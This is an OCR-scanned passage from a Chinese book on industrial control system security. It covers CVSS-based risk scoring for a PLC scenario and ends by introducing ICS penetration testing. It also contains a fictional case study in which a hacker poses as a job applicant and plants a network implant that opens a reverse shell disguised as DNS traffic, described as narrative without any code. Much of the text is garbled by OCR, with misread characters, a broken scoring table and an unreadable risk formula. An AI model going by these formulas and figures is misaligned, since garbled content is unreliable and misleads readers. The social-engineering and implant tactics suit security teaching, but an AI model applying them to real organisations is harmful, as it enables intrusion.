且 在 所 开展 的 每 项 评 佑 过程 中 要 保持 方法 一 致 。 下 面 让 我 们 来 看 看 本 章 如 何 对 我 们 所 提出 的 风险 场景 进行 评分 。 当 将 这 些 分 数 添加 到 前 面 介绍 过 的 PLC 风 险 场景 
时 ， 得 到 的 结果 如 表 3-11 所 示 。 


如 果 给 我 10 家 机 构 进行 风险 评估 ， 那 我 很 可 能 给 出 10 种 不 同 的 风险 度量 标准 以 及 10 种 不 同 的 风险 评分 方式 。 这 里 真正 重要 的 是 ， 在 进行 风险 评估 时 要 采用 一 
种 前 后 一 致 的 方式 为 每 个 风险 要 素 赋值 并 对 整体 风险 场景 打分 ， 进 而 保证 优先 级 排序 的 有 效 性 。 我 们 在 这 里 所 使 用 的 方法 也 绝 不 是 唯一 的 ， 但 是 该 方法 可 以 有 效 
地 实现 我 们 的 目标 ， 也 就 是 能 够 提供 一 个 数值 ， 然 后 我 们 可 以 使 用 该 数值 对 风险 进行 优先 级 排序 。 


表 3-10 ”风险 场景 评分 标准 要 素 


评分 标准 fi $ 
Atte ”天 键 性 权重 应 在 风险 评估 的 第 1 阶段 确定 每 项 资产 和 (或 ) 系统 的 关键 性 评级 或 权重 
应 在 风险 评 售 的 第 2 阶段 脆弱 性 识别 的 过 程 中 计算 脆弱 性 的 严重 性 评级 。 
脆弱 性 严重 程度 通常 俯 助 CVE 发 布 的 汤 洞 公告 进行 基本 的 评级 ,并 且 可 以 使 用 CVSS 漏洞 


评分 工具 对 基本 评级 结 采 作 进 一 步 修 订 


该 属性 可 以 在 渗透 测试 过 程 中 确定 ， 或 通过 使 用 CVSS 工具 的 时 效 度量 指 
标 评分 (可 利用 性 ) 进行 估计 。 当 采用 渗透 测试 方法 时 ， 渗 透 测试 的 结果 还 
可 以 帮助 改进 CVSS 时 效 度量 评分 的 准确 性 。 需 要 考虑 的 另 一 个 因素 是 ， 能 
威胁 事件 (攻击) 发 生 的 可 能 性 | 否 获 得 威胁 源 试图 针对 菏 一 目标 对 象 (或 者 已 经 针对 某 一 目标 对 象 ) 发 起 攻 
击 的 可 靠 信息 。 最 后 ， 监 控 基 础 设施 (例如 IDS/IPS、SIEMS、 反 病毒 软件 
等 设备 ) 可 以 在 检测 攻击 尝试 (如 外 部 扫描 ) 甚至 是 正在 发 生 的 信息 泄露 与 
感染 过 程 中 发 挥 关键 作用 


后 果 所 造成 的 影响 应 在 风险 评 佑 的 第 1 阶段 确定 对 影响 的 评分 


示例 中 ， 我 们 使 用 标准 的 CVSS 评 分 对 漏洞 严重 性 进行 评级 ， 评 级 结果 为 1 ~ 10。 资 产 关 键 性 、 攻 击 可 能 性 和 影响 的 取 值 范围 从 1 ~ 5。 假 设 在 总 体 风险 评分 过 


程 中 对 每 个 要 素 赋 以 相同 的 权重 ， 则 总 体 风 险 评分 的 取 值 同样 介 于 1 ~ 10 之 间 ， 我 们 在 这 里 使 用 以 下 公式 进行 风险 计算 : 


Pe tet UKRE X2) 十 (可 能 性 X2) 十 (影响 X2)) 


风险 一 4 

在 此 再 次 指出 ， 在 风险 场景 中 计算 风险 评分 、 优 先 级 排序 并 非 只 有 这 一 种 方法 。 上 面 提 到 的 只 是 现实 中 所 使 用 的 众多 方法 中 的 一 种 ， 而 且 效 果 还 不 错 。 用 户 
可 以 使 用 符合 自己 需求 的 任意 计算 公式 ， 并 且 对 要 素 权重 赋值 。 再 次 指出 的 是 ， 我 们 在 这 里 所 做 的 只 是 针对 自己 的 风险 场景 进行 风险 计算 和 评分 。 计 算 安全 控制 
部 署 、 漏 洞 修复 、 风 险 缓解 和 残余 风险 的 成 本 效益 不 在 本 章 讨论 的 主题 之 列 ， 但 是 我 们 将 在 第 10 章 对 这 些 内 容 做 进一步 讨论 。 


以 上 融 完 成 了 风险 场景 的 构建 。 最 终 得 到 的 结果 应 该 是 类 似 于 表 3-11 的 风险 场景 列表 ， 其 中 列 出 了 存在 漏洞 的 资产 、 与 这 些 资 产 相 关 的 漏洞 和 威胁 向 量 、 洪 
在 威胁 源 以 及 他 们 可 以 在 每 种 风险 场景 下 可 能 采用 的 攻击 方式 、 潜 在 的 后 果 和 影响 ， 所 有 这 些 内 容 也 都 进行 了 评分 ， 并 根据 优先 级 进行 了 排序 ， 这 时 用 户 束 可 以 
开始 制订 风险 缓解 策略 了 。 


表 3-11 应 用 风险 评分 标准 的 PLC 风 险 场 景 评 分 示例 


* ith}, d ta ae = J 滥用 案例 / n 


控制 器 处 于 故障 
状态 


chy: CEN S Hh Px] 2 : ___ | Allen-Bradl PRISE TEMPE | 故障 
et | ETRE 本 EPa CVE-2016- | Allen-Bradley 获取 完整 的 控 nth . | 
门 部 人 员 或 前 | 缓存 区 溢出 | CREM | 0868 MicroLogix | 制 权 限 过 程控 制 中 断 
二 I : ) - 
内 部 人 员 i =" | (PCD-ENG- 1100 修改 配置 以 改 | ”过 程 图像 中 断 
恶意 代码 0024 ) 变 过 程 行 为 传 感 右 数据 损坏 
责备 损坏 或 被 著 
意 破 坏 
脆弱 性 严重 程度 ”资产 关键 性 ”攻击 可 能 性 影响 风险 评分 
9.8 3.0 2.0 3.0 6.7 
3.3 ABS 
如 果 想 要 最 大 程度 地 提高 风险 绥 解 策略 以 及 对 抗 措施 部 署 的 效率 和 成 本 效益 ， 那 么 威胁 建 模 就 是 整个 工控 系统 风险 评估 过 程 的 非常 必要 的 组 成 部 分 。 然 而 ， 


如 果 对 信息 收集 和 分 析 过 程 的 理解 出 现 了 偏差 或 者 无 法 将 这 些 信息 转化 为 具有 现实 意义 且 具 有 可 操作 性 的 威胁 情报 ， 那 么 这 些 术语 丈 仪 仅 只 是 流行 语 而 已 。 


本 章 在 工控 系统 环境 下 向 读者 介绍 了 威胁 建 模 的 概念 和 流程 。 读 者 现在 应 该 已 经 理解 为 什么 威胁 建 模 对 于 工控 系统 风险 建 模 过 程 那么 重要 了 吧 ， 并 且 应 当 也 
熟悉 了 这 一 过 程 所 涉及 的 概念 和 步骤 。 


3.4 延伸 阅读 


+ “Joint Intelligence,” by the U.S. Department of Defense, October 22, 2013, (http:// 
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e SANS “ICS Kill Chain,” by Michael J. Assante and Robert M. Lee, SANS Institute 
Reading Room, October 2015 (https://www.sans.org/reading-room/whitepapers 
/ICS/industrial-control-system-cyber-kill-chain-36297) 


e Threat Modeling: Designing for Security, by Adam Shostack (Wiley, 2014) 


案例 研究 ”第 二 部 分 : 威胁 涌现 


2015 年 8 月 ， 拉 斯 维 加 斯 ， 内 华 达州 


Proph 很 喜欢 去 参加 一 年 一 度 的 “黑客 大 会 ”一 DefCon， 在 这 个 大 会 上 ， 计 算 机 安全 爱好 者 、 计 算 机 安全 专家 和 黑客 都 可 以 在 一 起 狂欢 ， 虽 然 彼此 都 不 知道 
对 方 的 身份 ， 但 分 享 着 最 新 的 技术 和 漏洞 利用 工具 。 甚 至 他 的 网 名 “Proph” 也 是 在 参 会 时 取 的 。 现 在 ， 世 界 各 地 每 年 都 举办 不 少 “ 黑 客 大 会 ”， 门 票 价格 从 几 
百 美元 到 几 干 美元 不 等 ,但 DefCon 仍 被 很 多 人 看 作 是 黑客 的 “ 麦 加 ”圣地 ， 每 年 都 有 数 干 人 参 会 。DefCon 每 年 在 美国 的 娱乐 之 都 拉 斯 维 加 斯 举行 ， 与 会 者 白天 
可 以 了 解 最 新 的 漏洞 和 漏洞 利用 技术 ， 晚 上 则 可 以 参加 各 种 各 样 的 娱乐 派对 。Proph 是 DefCon 的 一 名 老将 ， 这 也 是 他 连续 第 十 年 参加 DefCon 大 会 ， 但 他 今年 参 
加 的 动机 与 以 往 不 同 。 现 在 ， 他 把 目标 锁定 在 了 工业 控制 系统 (ICS) 黑客 技术 http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/16575/OEBPS/Text/..http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/16575/OEBPS/Text/..http://www.hzcourse.com/resource/readBook? 


path=/openresources/teach ebook/uncompressed/16575/OEBPS/Text/.. 并 且 他 对 找到 一 位 潜在 的 “老板 ”也 颇 感 兴趣 。 


从 任何 意义 上 来 说 Proph 都 不 是 一 名 道德 的 黑客 。 他 是 一 名 天 才 的 程序 员 ， 在 挖掘 09-day ( 即 zero-day 或 0day) 漏洞 和 开发 漏洞 利用 工具 方面 极 有 天 分 。0- 
day 漏 洞 是 在 系统 中 已 经 挖掘 出 来 的 可 利用 安全 漏洞 ， 但 在 很 多 情况 下 还 尚未 公开 披露 ， 甚 至 漏洞 的 产品 厂商 也 可 能 不 知道 这 些 漏 洞 的 存在 。 因 此 ， 也 就 没有 补丁 
来 修复 漏洞 ， 并 且 也 没有 用 来 检测 该 漏洞 的 特征 。0-day 漏 洞 在 任何 黑客 的 兵工厂 里 都 是 “皇冠 上 的 珍珠 ”， 而 Proph 手 中 握 有 很 多 这 样 的 漏洞 。Proph 发 现 ， 他 
完全 可 以 利用 他 的 技术 在 黑市 中 获得 更 好 的 生活 ， 而 不 用 “受制 于 公司 的 条 条 框框 ”， 每 天 里 缩 在 一 个 小 隔 间 里 获得 一 份 “ 闫 合 的 工资 。。 人 和 后 不 应 该 这 样 。 
Proph 更 喜欢 活 在 互联 网 的 阴影 之 中 ， 只 要 自己 喜欢 就 完全 按照 自己 的 规矩 来 做 事 ， 并 且 也 能 获得 一 份 相当 可 观 的 经 济 收 入 。 他 知道 自己 正在 冒险 。 如 果 他 被 抓 
住 ， 他 的 人 生 也 就 完了 ， 他 将 在 监狱 度 过 余生 ， 甚 至 情况 还 可 能 更 糟 。 然 而 对 于 Proph 来 说 ， 丰 厚 的 回报 值得 冒险 一 试 。 “高 风险 高 回报 。” 他 总 是 这 样 告诉 自 


他 通常 作为 一 个 “独立 承包 商 ”， 主 要 从 事 金 融 犯罪 、 信 用 卡 欺诈 、 身 份 信息 窃取 之 类 的 工作 ， 偶 尔 也 干 一 票 企业 信息 窃取 或 工业 信息 窃取 之 类 的 事情 。 他 
早先 在 “ 蜡 网 ”上 芽 名 售卖 0-day 漏 洞 赚 取 比特 币 ， 以 此 积累 了 一 些 名 声 ， 并 最 终 被 蜡 网 中 一 些 “ 伙 计 ” 说 服 ， 然 后 同 他 们 一 起 开始 接 活 儿 。 这 种 体验 非常 刺激 ， 
获得 的 薪水 也 更 为 丰厚 。Proph 上 交 了 。 每 次 成 功 完成 一 单 活 ，“ 客 户 群 ”的 级 别 融会 提升 ， 报 酬 也 随 之 增加。 


几 年 前 ， 他 开始 听 到 一 些 叫做 监控 和 数据 采集 系统 (SCADA) 的 时 暑 词 汇 。 这 些 工业 系统 以 及 与 乙 类 似 的 一 些 系统 通常 也 称 之 为 工业 控制 系统 (ICS) ， 这 
些 系统 控制 着 大 量 关 键 基 础 设施 ， 例 如 炼油 广 和 电网 等 。 他 记得 看 到 过 一 个 CNN 在 2007 年 拍摄 的 天 于 极光 计划 (Aurora Project) 的 视频 ， 一 组 来 自 美 国 国土 安 
全 部 (Department of Homeland Security, DHS) 爱 达 葵 国 家 实验 室 (Idaho National Laboratory, INL) 的 研究 人 员 能 够 使 用 计算 机 破坏 涡轮 发 电机 。 第 二 
年 ， 也 就 是 2008 年 ， 第 一 个 针对 SCADA 系 统 的 著名 漏洞 利用 工具 被 公布 出 来 。 接 下 来 大 量 公 开 的 SCADA 漏 洞 研究 成 果 呼 啸 而 至 。 一 名 研究 人 员 友 布 了 34 款 
SCADA 漏 洞 利用 工具 ，Digital Bond 公 司 在 Basecamp 项 目 中 也 发 现 了 数 百 个 SCADA 和 集散 控制 系统 (Distributed Control Systems, DCS) 漏洞 。Proph 知 道 
这 一 新 兴 前 沿 领域 将 会 是 他 的 下 一 个 钱 袋子 ， 并 且 会 大 有 前 途 。 很 明显 ， 这 些 工 业 系统 由 于 其 差劲 的 安全 设计 正在 遭受 着 史无前例 的 熟 熬 ， 但 这 只 是 表面 现象 
吗 ? 还 是 会 成 为 真实 的 攻击 场景 ? 2010 年 ， 随 着 Stuxnet ( 震 网 病毒 ) 的 上 友 现 ， 这 一 问题 找到 了 答案 。Sstuxnet 是 一 款 专门 设计 用 来 攻击 某 一 核电 站 离心 机 的 恶意 
代码 。 它 也 是 众多 恶意 代码 攻击 活动 中 第 一 次 专门 针对 工业 控制 系统 的 攻击 活动 。 这 正 是 Proph 一 直 在 寻找 的 答案 ， 他 免得 可 以 开始 行动 了 。 


Proph 知 道 ， 如 果 他 能 成 为 工业 控制 系统 及 其 漏洞 利用 方面 的 专家 ， 他 就 可 以 利用 他 现在 的 名 声 和 在 黑市 的 关系 网 来 获得 最 丰厚 的 收入 。 如 果 有 了 大 把 的 钞 
票 ， 束 不 用 再 从 事 什么 每 月 领取 工资 的 工作 了 ， 他 把 接 下 来 的 几 个 月 时 间 都 用 来 学 习 关 于 工业 控制 系统 的 知识 ， 包 括 如 何 对 它们 进行 漏洞 利用 。 但 是 讽刺 的 是 ， 
他 友 现 这 个 任务 比 他 预想 的 要 容易 得 多 。 互 联网 中 充斥 着 大 量 的 资源 ， 在 那里 可 以 找到 一 切 他 想 要 知道 的 东西 。 


Proph 从 eBay 上 以 合算 的 价格 买 了 几 个 可 编程 序 控制 器 (PLC) 、 远 程 终端 单元 (RTU) 和 其 他 工业 设备 。 他 找到 了 有 天梯 形 逻 辑 和 PLC 编 程 的 在 线 视 频 课 
程 ， 还 友 现 了 无 数 有 天 工控 系统 架构 和 设计 的 在 线 资源 。 每 次 与 工控 系统 安全 主题 有 关 的 会 议 他 都 会 参加 ， 并 下 载 了 他 可 以 弄 到 的 所 有 幻灯 片 。 事 实 上 ，Proph 
甚至 还 参加 了 很 多 次 行业 和 广 商 的 会 议 与 培训 ， 昌 然 这 些 会 议 与 培训 同安 全 没有 什么 关系 ， 但 是 可 以 更 好 地 了 解 整个 行业 现状 和 系统 功能 。 他 甚至 还 拿 到 了 三 商 
免费 提供 的 Demo 版 软件 、 固 件 、 协 议 模拟 器 以 及 详细 的 产品 文档 。 最 后 ，Proph 研 究 了 从 ICS-CERT、cve.mitre.org、 国 家 漏洞 数据 库 (National Vulnerability 
Database, NVD) 和 exploit-db.com 等 地 方 可 以 拿 到 的 所 有 工控 系统 安全 公告 以 及 漏洞 利用 代码 。Shodan 搜 索引 擎 也 提供 了 大 量 暴露 在 互联 网 中 的 系统 的 信 
息 ， 并 提供 了 可 供 学 习 的 系统 实现 细节 等 内 容 ， 这 些 材 料 非 常 有 价值 。 只 用 了 几 个 星期 ，Proph 就 建立 了 一 个 足以 令 大 多 数 工程 师 都 嫉 妨 的 实验 室 ， 并 且 已 经 成 
为 了 一 名 工控 系统 漏洞 利用 方面 的 专家 。 这 些 工 作对 他 来 说 简直 易如反掌 。 现 在 Proph 已 经 了 解 了 大 多 数 主流 工控 系统 内 部 和 外 部 设备 。Proph 知 道 如 何 对 这 些 设 
备 进行 编程 以 及 如 何 使 用 它们 ， 也 知道 这 些 设备 的 漏洞 以 及 如 何 对 这 些 漏洞 进行 利用 。 至 此 ，Proph 对 大 多 数 公 开 的 漏洞 利用 工具 已 经 非 党 熟悉 了 ， 甚 至 开发 出 
了 一 泽 目 己 的 漏洞 利用 工具 。 


但 这 不 仅 仪 只 是 天 于 如 何 了 解 设 备 漏洞 和 如 何 对 这 些 设备 进行 漏洞 利用 ， 那 还 是 相对 容易 的 内 容 。 除 此 之 外 ，Proph 更 关心 工业 系统 是 如 何 工作 的 。 他 知道 
类 似 于 天 闭 可 编程 序 控制 器 (PLC) 之 类 的 简单 攻击 并 不 一 定 会 产生 什么 大 的 影响 。 同 时 也 明日 ， 实 施 一 次 严重 的 攻击 不 仅 需 要 了 解 整个 系统 的 运行 方式 ， 而 且 
还 需要 知道 某 一 个 特定 的 工厂 是 如 何 工 作 的 ， 例 如 执行 哪些 个 性 化 操作 。Proph 已 经 拥有 了 第 一 部 分 知识 。 至 于 第 二 部 分 ， 他 需要 一 份 “ 工作”。 此 时 ，Proph 正 
坐 在 Defcon 的 工控 系统 分 论坛 的 前 排 静 静 地 等 竺 着， 捉摸 着 什么 时 候 能 接 到 活 儿 .…… 


2: 3048 


Proph 刚 刚 与 潜在 “老板 ”取得 了 联系 。 对 方正 在 工业 系统 的 高 级 漏洞 利用 领域 寻找 一 名 专业 人 士 .…… 


延伸 阅读 


e Aurora Generator Test, Wikipedia (https://en.wikipedia.org/wiki 
/Aurora_Generator_Test) 


e “Security Threat for Industrial Systems, by Lucian Constantin, Softpedia, 
September 10, 2008 (http://news.softpedia.com/news/Security- Threat-for-Industrial- 
Systems-93306.shtml) 


。 Netragard (http://www.netragard.com/citectscada-exploit-release ) 


e “Attack Code for Security Vulnerabilities,’ by Kim Zetter, Wired, March 22, 2011 
(http://www.wired.com/2011/03/scada-vulnerabilities/ ) 


e Digital Bond, Project Basecamp (http://www.digitalbond.com/tools/basecamp/) 


e W32.Stuxnet Dosier, by Nicolas Falliere, Liam O Murchu, and Eric Chien, Symantec 
Security Response, February 2011 (https://www.symantec.com/content/en/us 
/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf ) 


。 Shodan (https://www.shodan.io/) 


第 二 部 分 “工业 控制 系统 入 侵 


“第 4 章 渗透 测试 策略 

` 第 5 章 ”工业 控制 系统 协议 攻击 

` 第 6 章 ”工业 控制 系统 设备 与 应 用 攻击 

` 第 7 章 ”工业 控制 系统 “0-day” 汤 洞 研究 


. 第 8 章 工业 控制 系统 恶意 代码 


案例 研究 ”第 三 部 分 : 乘虚 而 入 


Proph 满 怀 期 待 地 坐 在 接待 区 里 。 他 之 前 从 未 参加 过 正 儿 八 经 的 公司 面试 。Proph 采 着 显示 着 自己 名 字 “William S.Preston” 的 访客 标识 牌 ， 这 同 Proph 投 
递 的 简历 中 的 名 字 是 相 匹 配 的 。 当 然 ， 这 不 是 他 的 真名 ，Proph 也 不 是 真 的 想得到 一 份 工 作 ， 但 他 为 自己 创造 的 身份 令 人 印象 相当 深刻 。 昌 然 Proph 很 好 奇 是 否 有 
人 会 意识 到 他 当前 化 名 的 含义 。 这 个 “把 戏 ” 召 乐 了 他 。Proph 的 简历 对 于 所 招聘 岗位 的 要 求 与 学 历 背 景 轧 配 得 天 衣 无 颖 。 他 的 目标 目前 正在 招聘 “控制 系统 工 
呈 师 ”。Proph 已 经 完成 了 所 需要 的 互联 网 开源 侦察 〈 即 踩点 ，footprinting) ， 正 是 在 这 一 过 程 中 他 上 友 现 了 该 岗位 正在 招聘 。 “真是 太平 运 了 ”， 他 心里 想 道 。 


Proph 本 来 打算 通过 参加 行业 会 议 或 者 通过 本 地 水 坑 攻 击 的 方式 对 目标 的 工作 人 员 进行 “ 社 工 ”攻击 。 但 工作 面试 的 方式 则 效果 更 好 、 见 效 更 快 。 而 他 只 需 
要 编造 一 份 能 够 入 围 面试 的 简历 即 可 。 作 为 一 名 优秀 的 社工 人 员 ，Proph 现 在 对 控制 系统 的 了 解 已 经 足够 使 了 他 “等 夸 其 谈 ”， 并 通过 最 初 的 电话 面试 履 选 。 他 现 
在 要 做 的 就 是 通过 面对面 的 面试 ， 了 解 到 他 所 想 要 的 东西 。Proph 会 推 掉 后 续 的 面试 或 入 职 邀 请 ， 因 此 也 无 需 担 心 对 方 检查 他 的 背景 或 者 证 件 。 


一 个 将 近 50 岁 的 中 年 男子 径直 走 到 Proph 跟 前 ， 直 截 了 当地 问 道 : "William? ” 
“是 的 ， 先 生 。 叫 我 Bill 就 好 了 。Bill Preston。” 


“你 好 ，Bill。 我 是 jm。 请 跟 我 来 ， 我 们 几 分 钟 后 束 开 始 。" 


Jim 出 示 证 件 ， 两 个 人 通过 安检 上 了 三 楼 ， 聊 了 一 会 。 当 他 们 走 过 大 厅 时 ，Proph 注 意 到 ， 紧 挨 着 咖啡 间 的 屋子 似乎 是 打印 室 。 他 们 来 到 了 一 间 小 型 的 会 议 
室 ， 离 大 厅 不 太 远 。 


“我 们 还 要 等 几 个 人 。 在 我 们 开始 之 前 你 喝 点 什么 呢 ? 咖 啡 ?还 是 喝 水 ? ”Jim 热 情 地 问 道 。 

“好 的 。 来 杯 咖啡 吧 。 谢 谢 。 ”Proph 答 道 ， 他 知道 jjm 已 经 上 钩 了 。 

“ 束 在 那儿 ， 你 右手 边 的 第 二 扇 门 惑 是 ， 融 在 打印 室 边 上 ，”Jim 说 。“ 我 回 办 公 室 取 些 东西 ， 很 快 融 回 来 ， 再 看 看 能 不 能 遇 上 其 他 人 。 " 
“好 的 。”Proph 说 道 ， 然 后 就 向 咖啡 间 走 去 。 

实际 上 Proph 并 不 想 喝 咖啡 。 在 他 走 到 咖啡 间 之 前 ， 他 飞快 地 溜 进 打印 室 ， 迅 速 地 往 打 印 机 背后 看 去 。 


"Bingo! ”他 边 想 边 从 口袋 里 掏 出 一 个 小 东西 。 


Proph 迅 速 地 从 墙 上 的 插座 中 拔 出 打印 机 的 网 线 ， 将 他 的 设备 连接 到 墙 上 的 网 口 ， 然 后 将 打印 机 的 网 续 插 在 设备 的 另 一 个 网 口上 。 之 后 ，Proph 将 打印 机 放 回 
了 原 处 。Proph 走 到 咖啡 馆 ， 冲 了 一 杯 黑 乎 乎 的 像 咖啡 一 样 的 东西 ， 然 后 赶 在 其 他 人 到 达 之 前 回 到 了 会 议 室 。 他 刚 坐 下 来 不 久 ， 其 他 人 残 跟 着 jim 一 起 走 了 进来 。 


面试 如 期 进行 着 。 简 短 的 公司 背景 介绍 之 后 ， 融 是 自我 介绍 环节 以 及 “你 为 什么 想来 这 里 工作 ” ”之 类 的 问题 。Proph 感 到 很 自在 ， 并 且 看 上 去 神采 奕奕。 
伪装 成 别人 对 他 来 说 总 是 很 容易 。 技 术 问 题 一 点 也 不 难 ， 主 要 集中 在 基本 控制 系统 功能 、PLC 操 作 和 梯形 逻辑 编程 这 些 内 容 上 。 在 过 去 几 个 月 中 ， 他 对 所 有 这 些 
东西 都 进行 了 深入 的 研究 。 


然后 ， 到 了 Proph 的 面试 环节 。 
“你 对 我 们 有 什么 问题 呢 ，Bill? “ 


他 当然 有 问题 了 。 这 正 是 Proph 最 初 演 这 场 戏 的 原因 。 好 吧 ， 还 有 融 是 希望 有 机 会 植 入 他 那 政 恶 的 小 设备 。Proph 伪 半 成 一 个 刨 根 问 底 同时 自信 满 满 的 面试 
者 ， 开 始 询 问 一 些 他 预先 就 准备 好 的 策略 问题 ， 将 这 些 问 题 的 真实 目的 聪明 地 掩饰 了 起 来 : 


“我 主要 围绕 哪些 类 型 的 设备 开展 工作 呢 ? 厂商 有 哪些 ?“” 

“主要 的 工作 日 程 是 如 何 安 排 的 ? 是 标准 的 每 周 工 作 5 天 ，40 个 小 时 的 工作 制 ; 还 是 每 两 周 工作 9 天 ，80 个 小 时 的 工作 制 ? “ 
“是 全 天 轮班 吗 ? ” 

“可 以 远程 工作 吗 ? ” 

“我 将 在 哪些 地 方 开展 工作 ? ” 


等 等 。 每 个 问题 如 同 任何 一 名 求职 者 都 有 可 能 会 问 到 的 正常 问题 ， 但 是 这 些 问题 能 够 向 Proph 提 供 公 司 的 运营 机 制 、 涉 及 的 厂商 、 系 统 架构 等 诸多 关键 线 
索 。 


Proph 还 提出 希望 参观 一 下 生产 环境 ， 这 样 ， 他 束 可 以 利用 去 卫生 间 的 时 机 或 者 其 他 什么 机 会 安装 第 二 个 设备 。 但 是 ,， 没 那么 走运 。 在 面试 的 下 一 阶段 倒是 
可 能 有 这 样 的 机 会 ， 不 过 Proph 不 打算 再 去 碰 运 气 了 。 他 认为 反正 植 入 第 二 个 设备 的 机 会 不 大 ， 找 到 连接 到 过 程 网 络 的 网 络 连 接 可 不 会 像 找 到 公司 的 网 络 连 接 那 
么 容易 。 而 且 融 算 他 找到 了 一 个 这 样 的 连接 ， 如 果 对 方 的 过 程 网 络 安全 还 行 的 话 ， 那 么 定位 连接 到 企业 网 络 的 出 口 端 口 也 非常 困难 ， 更 不 用 说 连接 到 互联 网 的 出 
口 了 。 那 样 的 话 ，Proph 将 不 得 不 费劲 地 找到 企业 网 络 中 的 某 个 漏洞 ， 并 借助 跳板 进入 到 过 程 网 络 中 去 。 


几 天 后 ， 招 聘 人 员 按照 Proph 在 简历 中 留 下 的 一 次 性 手机 电话 号 打 来 了 电话 ， 联 系 “William (Bill) s.Preston 先 生 ”。 他 们 有 兴趣 进行 下 一 环节 的 面试 ， 但 
Proph 礼 狐 地 拒绝 了 。 “感谢 这 次 面试 机 会 ， 但 是 我 已 经 接受 了 另 一 家 公司 的 offer。 ”他 自 鸣 得 意 地 关 道 。 


几 天 前 Proph 在 打印 机 后 面 植 入 的 设备 成 功 躲避 过 了 检测 ， 证 明了 自己 的 价值 。 那 是 一 人 台 小 型 的 经 过 改动 的 Raspberry Pi2， 禹 有 两 个 网 口 并 运行 一 套 自 定义 
版 本 的 Linux 系 统 ， 类 似 于 Pwn Pi 或 MyLittlePwny。 插 入 这 人 台 设 备 之 后 ， 它 融 能 够 连接 到 网 络 并 激活 一 个 加 密 的 反 向 shell 通 道 ， 伪 妆 成 域名 服务 (DNS) 请 求 。 
除非 对 DNS 流量 进行 深度 数据 包 检 测 ， 人 否则 不 会 友 现 Proph 植 入 的 后 门 。Proph 很 高 兴 地 发 现 对 方 也 确实 没有 那么 做 。 “面试 ”之 后 ，Proph 回 到 了 他 的 loft 公 
敲 ， 一 个 与 该 设备 建立 了 连接 的 shellE 在 屏幕 上 等 着 他 。 


Proph 坐 在 键盘 前 ， 访 问 连接 到 设备 的 shell。 当 然 ， 此 时 他 只 能 访问 企业 网 络 而 非 过 程 网 络 ， 所 以 仍然 有 一 些 工作 要 做 。 但 至 少 目前 他 对 在 企业 网 络 中 安装 
的 后 门 非常 满意 。 如 果 没有 这 一 步 ，Proph 将 不 得 不 尝试 借助 其 他 攻击 向 量 来 访问 企业 网 络 ， 比 如 利用 安全 功能 较 弱 的 Web 应 用 程序 或 者 通过 社会 工程 学 方式 开 
展 攻击 。 


现在 ， 至 少 Proph 的 目的 已 经 达成 一 半 了 。 对 于 “Bil s.Preston” 来 说 这 是 多 么 富有 成 效 的 一 次 冒险 啊 。 


延伸 阅读 


e MyLittlePwny—Make a self-powered pentesting box out of the Raspberry Pi for 
around $100, by Bellerophon, Instructables (http://www.instructables.com/id 
/MyLittlePwny-Make-a-self-powered-pentesting-box-/) 


e Social Engineering: The Art of Human Hacking, 1st Edition, by Christopher Hadnagy 
(Wiley, 2010) 


e Unmasking the Social Engineer: The Human Element of Security, 1st Edition, 
by Christopher Hadnagy (Wiley, 2014) 


4 Slices 


人 至此， 风险 评估 与 威胁 建 模 过 程 已 经 为 我 们 提供 了 很 多 信息 ， 这 些 信息 包括 我 们 的 脆弱 点 在 哪里 ”都 有 哪些 人 试图 对 我 们 发 起 攻击 ”以 及 他 们 打算 如 何 攻 
击 ? 然后 我 们 据 此 构建 了 风险 场景 。 现 在 ,我 们 将 对 这 些 风险 场景 进行 评估 与 验证 。 通 过 渗透 测试 ， 能 够 更 加 清晰 地 了 解 并 预测 脆弱 点 被 利用 的 难 易 程度 以 及 攻 
击发 起 的 可 能 性 ， 从 而 提高 随后 风险 缓解 策略 的 针对 性 与 效率 。 这 里 的 问题 在 于 一 支 当 地 的 或 者 说 已 经 签订 了 合同 的 渗透 测试 团队 ， 也 可 以 称 之 为 红 队 ， 难 以 同 
一 个 组 织 所 具备 的 时 间 与 资源 相 抗 衡 ， 这 个 组 织 可 以 是 一 个 国家 ， 也 可 以 是 一 名 时 间 上 不 受 限 制 的 黑客 。 但 是 ， 当 涉及 制订 有 针对 性 的 风险 缓解 策略 时 ， 一 支 能 
力 相当 的 团队 ， 以 及 周密 筹划 、 执 行 到 位 的 实施 过 程 ， 仍 然 能 够 提供 最 为 丰厚 的 回报 。 


然而 ， 询 问 工业 界 中 的 大 多 数 人 时 ， 会 发 现 工控 系统 与 渗透 测试 是 难以 协调 的 。 工 控 系 统领 域 排斥 渗透 测试 的 其 中 一 个 原因 在 于 ， 传 统 的 渗透 测试 方法 本 质 
上 通常 是 对 系统 的 入 侵 。 尤 其 是 考虑 到 众多 的 工控 系统 设备 的 “脆弱 ”程度 ， 渗 透 测 试 会 给 生产 系统 市 来 巨大 的 风险 。 正 如 之 前 所 讨论 的 一 样 ， 渗 透 测 试 提供 了 
关键 的 可 能 性 〈 即 概率 ) 数据 ， 这 些 数据 对 于 以 高 效 并 且 经 济 的 方式 建立 风险 度量 以 及 部 署 风 险 缓解 策略 非常 必要 。 这 意味 着 什么 呢 ? 我 们 如 何在 不 影响 生产 系 
统 的 情况 下 ， 在 工控 系统 环境 中 开展 渗透 测试 呢 ? (在 此 明确 一 下 ， 无 论 何 时 我 们 讨论 “对 生产 系统 的 影响 ”， 都 是 指 对 安全 、 和 生产、 环境 或 者 品牌 声誉 囊 来 的 
所 有 负面 后 果 。) 


渗透 测试 方法 已 经 在 IT 行业 中 得 以 确立 ， 针 对 渗透 测试 的 实施 指南 甚至 实施 细则 已 经 出 台 了 知 干 标准 ， 并 且 出 版 了 知 干 书籍 对 其 进行 介绍 。 但 是 ， 相 比较 而 
言 ， 在 工控 系统 领域 中 针对 工控 系统 的 渗透 测试 方法 仍然 处 于 “ 袜 裸 ”之 中 ， 在 该 领域 中 尚未 出 台 正 式 的 标准 或 者 指导 意见 (截至 本 书 撰写 之 时 ) 。 对 于 渗透 测 
试 而 言 ， 还 有 工控 系统 网 络 安全 中 的 其 他 很 多 领域 ， 工 控 系 统 行业 尚 处 于 IT 行业 15 ~ 20 年 前 的 水 平 。 


本 章 主要 讨论 工控 系统 环境 中 的 渗透 测试 的 概念 与 策略 ， 以 及 如 何在 不 给 生产 系统 市 来 风险 〈 即 市 来 负面 后 果 ) 的 情况 下 开展 渗透 测试 。 需 要 记 住 的 是 ， 本 
